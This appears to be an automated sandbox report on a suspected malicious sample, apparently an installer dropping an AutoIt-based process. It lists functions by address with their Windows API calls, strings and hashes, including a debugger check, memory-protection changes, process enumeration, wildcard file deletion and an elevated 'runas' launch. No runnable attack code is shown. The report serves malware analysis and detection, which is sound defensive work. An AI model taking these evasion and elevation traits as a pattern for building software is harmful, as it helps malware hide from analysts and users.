Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Appliance.comPID: 4504, Parent PID: 2008COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	55

Executed Functions

Function 00DC5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00DC5FF7

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

GetCurrentProcess.KERNEL32(?,00E5DC2C,00000000,?,?), ref: 00DC6123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00DC612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00DC6155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DC6167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00DC6175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00DC617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00DC61A1

Strings

GetNativeSystemInfo, xrefs: 00DC6161
kernel32.dll, xrefs: 00DC6150
|O, xrefs: 00E050F7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: bb033e74274e93dc63731c52b7a7137a6277065f7ad0a15af69da0d2f65fb842
Instruction ID: e7a03bcab44ff5ef76cc6002649744550264baeec0a238681dbab660abae6287
Opcode Fuzzy Hash: bb033e74274e93dc63731c52b7a7137a6277065f7ad0a15af69da0d2f65fb842
Instruction Fuzzy Hash: ADA1863280A7C7FFCF15CB6A7C416A57F546B26305B0858AFD681B7262C269854CCF71

Function 00DC338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00DC3368,?), ref: 00DC33BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00DC3368,?), ref: 00DC33CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00E92418,00E92400,?,?,?,?,?,?,00DC3368,?), ref: 00DC343A

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

Part of subcall function 00DC425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DC3462,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00DC42A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00DC34BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E03CB0
SetCurrentDirectoryW.KERNEL32(?,00E92418,?,?,?,?,?,?,?,00DC3368,?), ref: 00E03CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E831F4,00E92418,?,?,?,?,?,?,?,00DC3368), ref: 00E03D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00E03D81

Part of subcall function 00DC34D3: GetSysColorBrush.USER32(0000000F), ref: 00DC34DE
Part of subcall function 00DC34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00DC34ED
Part of subcall function 00DC34D3: LoadIconW.USER32(00000063), ref: 00DC3503
Part of subcall function 00DC34D3: LoadIconW.USER32(000000A4), ref: 00DC3515
Part of subcall function 00DC34D3: LoadIconW.USER32(000000A2), ref: 00DC3527
Part of subcall function 00DC34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC353F
Part of subcall function 00DC34D3: RegisterClassExW.USER32(?), ref: 00DC3590

Part of subcall function 00DC35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC35E1
Part of subcall function 00DC35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3602
Part of subcall function 00DC35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC3616
Part of subcall function 00DC35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC361F

Part of subcall function 00DC396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DC3A3C

Strings

0$, xrefs: 00DC3495
AutoIt, xrefs: 00E03CA5
runas, xrefs: 00E03D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E03CAA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-3328958999
Opcode ID: 22e245aa1650b4d4f1b7962b631543eb67eeb559f16d3fbb6b72f433bd68f057
Instruction ID: 8dcf978cd502e8e1cade87217bb17322fdb40ccafbcfb4771b4ad26af20c3727
Opcode Fuzzy Hash: 22e245aa1650b4d4f1b7962b631543eb67eeb559f16d3fbb6b72f433bd68f057
Instruction Fuzzy Hash: 3251F37014C342BEDB15FF719C02E6E7BA8EB94704F00142EF596771A2CA248A8DDB72

Function 00E2DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871

Part of subcall function 00E2EAB0: GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00E2DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E2DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E2DD2C
FindClose.KERNEL32(00000000), ref: 00E2DD43
FindClose.KERNEL32(00000000), ref: 00E2DD4C

Strings

\*.*, xrefs: 00E2DC9D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 1c695f6071f6e2f03b2042622d06dcf29b9b939f7771b7652e20db17d40a99a1
Instruction ID: db202f59da66a3a25c566acbe65eec0c096e433128a900c9de049e658196d239
Opcode Fuzzy Hash: 1c695f6071f6e2f03b2042622d06dcf29b9b939f7771b7652e20db17d40a99a1
Instruction Fuzzy Hash: 74315B3100C3569FC205EB60DC82EAFB7A8AE95314F405E5DF5D6A31A1EB21DA09CB73

Function 00E2DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E2DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00E2DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00E2DDDA
CloseHandle.KERNEL32(00000000), ref: 00E2DE87

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 35b1af0adddb922d52b5ce441826b51911ccee670317d03096aad892af70a927
Instruction ID: 01333eb34d32b83252a0231154ce3ab017e54a9a0d0f226f407996e708a33c9a
Opcode Fuzzy Hash: 35b1af0adddb922d52b5ce441826b51911ccee670317d03096aad892af70a927
Instruction Fuzzy Hash: 53316D724083019FD314EF60DC85BABBBE8EF99354F04092DF582971A1DB71D989CBA2

Function 00DDFFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00DE007D
NtProtectVirtualMemory.NTDLL ref: 00DE008F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseHandleMemoryProtectVirtual
String ID:
API String ID: 2407445808-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 92c929e535d8ea9afbc77985ed3c02afd7a78189941e3b17cc176a8e7e94bf0d
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1831E670A00145DFC718EF5AD480A69FBB6FF49300B6886A5E449CB656D7B2EDC1CBE0

Function 00DDAC3E Relevance: 33.9, APIs: 1, Strings: 18, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P, xrefs: 00DDAD3D
t, xrefs: 00DDADCC
`, xrefs: 00DDADE2
`*, xrefs: 00DDAFF9
d0b, xrefs: 00DDAC96, 00DDAD10, 00DDAEA7
d1r0,2, xrefs: 00DDACA9
d1b, xrefs: 00DDAD55, 00DDAE8E
(, xrefs: 00DDADD7
d10m0, xrefs: 00DDACF0
i, xrefs: 00DDB0A3
(, xrefs: 00DDADC1
@, xrefs: 00DDADED
4, xrefs: 00DDAD45
e#, xrefs: 00DDAFA9
(, xrefs: 00DDAD65
(, xrefs: 00DDAD4D
t, xrefs: 00DDAD35
d5m0, xrefs: 00DDAE75

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
API String ID: 0-2951036942
Opcode ID: 9e191e17ef87f176c2a41ac7c489bda5476547cf37d0c68ad82b0f755ebcd7d5
Instruction ID: 1708f9bb033e3d8fbe6ed2efb186eb8bd2a2b9c6cc4836a06ad86f8c33b22933
Opcode Fuzzy Hash: 9e191e17ef87f176c2a41ac7c489bda5476547cf37d0c68ad82b0f755ebcd7d5
Instruction Fuzzy Hash: F0624970508341CFC728DF14C585A9ABBE1FF88318F14995EE899AB351DB70D949CFA2

Function 00DC370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DC3709,?,?), ref: 00DC3777
KillTimer.USER32(?,00000001,?,?,?,?,?,00DC3709,?,?), ref: 00DC37A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DC37C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DC3709,?,?), ref: 00DC37D1
CreatePopupMenu.USER32 ref: 00DC37E5
PostQuitMessage.USER32(00000000), ref: 00DC3806

Strings

0$, xrefs: 00E03DA9
0$, xrefs: 00E03DF7
TaskbarCreated, xrefs: 00DC37CC

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$$0$$TaskbarCreated
API String ID: 129472671-3836791346
Opcode ID: bf2d9c1bbbaab8aaf6da58a211f31c0b3d15ed8ce937aa869a1cd5672b8adf56
Instruction ID: 2cb777bc49f0c273521c055e76495e90bac52dc643602d47be258ade8665389a
Opcode Fuzzy Hash: bf2d9c1bbbaab8aaf6da58a211f31c0b3d15ed8ce937aa869a1cd5672b8adf56
Instruction Fuzzy Hash: D241E2F0104247BEDF286B79DC4AF693A69EB44305F04822FF646B71D0DA749F488671

Function 00DC3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DC3657
RegisterClassExW.USER32(00000030), ref: 00DC3681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC3692
InitCommonControlsEx.COMCTL32(?), ref: 00DC36AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC36BF
LoadIconW.USER32(000000A9), ref: 00DC36D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC36E4

Strings

0, xrefs: 00DC3639
+, xrefs: 00DC3640
AutoIt v3 GUI, xrefs: 00DC3673
TaskbarCreated, xrefs: 00DC3687

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b6108a10e5e97d0e57d9a6a908dfbd085ca248e386b524e71ac8d03711ded81b
Instruction ID: 4664f1de2b1136b3875e7ec3e97a56ede98aeee5e95abcef2947de6dcae74815
Opcode Fuzzy Hash: b6108a10e5e97d0e57d9a6a908dfbd085ca248e386b524e71ac8d03711ded81b
Instruction Fuzzy Hash: 6021EFB5905309AFDF14DFA6EC89BDEBBB4FB08711F00451BEA11B62A0D7B445488F91

Function 00E009DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E0071A: CreateFileW.KERNEL32(00000000,00000000,?,00E00A84,?,?,00000000,?,00E00A84,00000000,0000000C), ref: 00E00737

GetLastError.KERNEL32 ref: 00E00AEF
__dosmaperr.LIBCMT ref: 00E00AF6
GetFileType.KERNEL32(00000000), ref: 00E00B02
GetLastError.KERNEL32 ref: 00E00B0C
__dosmaperr.LIBCMT ref: 00E00B15
CloseHandle.KERNEL32(00000000), ref: 00E00B35
CloseHandle.KERNEL32(?), ref: 00E00C7F
GetLastError.KERNEL32 ref: 00E00CB1
__dosmaperr.LIBCMT ref: 00E00CB8

Strings

H, xrefs: 00E00C3D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ed4c1a951a3949d4ddb9bac38bb2c877ae0094c952f4a3e7ac5473d86f28e39a
Instruction ID: 82cdab99c3f5aa1fad131f1cbd6a98a54282291b98656b450c413bd49c388b82
Opcode Fuzzy Hash: ed4c1a951a3949d4ddb9bac38bb2c877ae0094c952f4a3e7ac5473d86f28e39a
Instruction Fuzzy Hash: 36A12732A041498FDF19AF68D851BAD7BA0EB06324F14119EF811FB3D1D7359D46CB62

Function 00DC52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DC5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00DC55B2

Part of subcall function 00DC5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DC525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DC53C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E04BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E04C3E
RegCloseKey.ADVAPI32(?), ref: 00E04C80
_wcslen.LIBCMT ref: 00E04CE7
_wcslen.LIBCMT ref: 00E04CF6

Strings

\Include\, xrefs: 00DC5381
Include, xrefs: 00E04BF4, 00E04C35
\, xrefs: 00E04CFC
Software\AutoIt v3\AutoIt, xrefs: 00DC53BA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: dddf78c45aee66ce32928533d0f91e0519182f559e1efc1ce64abf6a96cc4c34
Instruction ID: 1d16c7fb423d9fec8cfb6fb42d2c123001b6a212eb700768c6e5d0d22a2f1cab
Opcode Fuzzy Hash: dddf78c45aee66ce32928533d0f91e0519182f559e1efc1ce64abf6a96cc4c34
Instruction Fuzzy Hash: 56718EB1545301AEC314EF66EC81A9BBBE8FF94340F40042FF555A71A0EB71DA89CB61

Function 00DC34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DC34DE
LoadCursorW.USER32(00000000,00007F00), ref: 00DC34ED
LoadIconW.USER32(00000063), ref: 00DC3503
LoadIconW.USER32(000000A4), ref: 00DC3515
LoadIconW.USER32(000000A2), ref: 00DC3527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DC353F
RegisterClassExW.USER32(?), ref: 00DC3590

Part of subcall function 00DC3624: GetSysColorBrush.USER32(0000000F), ref: 00DC3657
Part of subcall function 00DC3624: RegisterClassExW.USER32(00000030), ref: 00DC3681
Part of subcall function 00DC3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DC3692
Part of subcall function 00DC3624: InitCommonControlsEx.COMCTL32(?), ref: 00DC36AF
Part of subcall function 00DC3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DC36BF
Part of subcall function 00DC3624: LoadIconW.USER32(000000A9), ref: 00DC36D5
Part of subcall function 00DC3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DC36E4

Strings

AutoIt v3, xrefs: 00DC357F
0, xrefs: 00DC355F
#, xrefs: 00DC3566

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

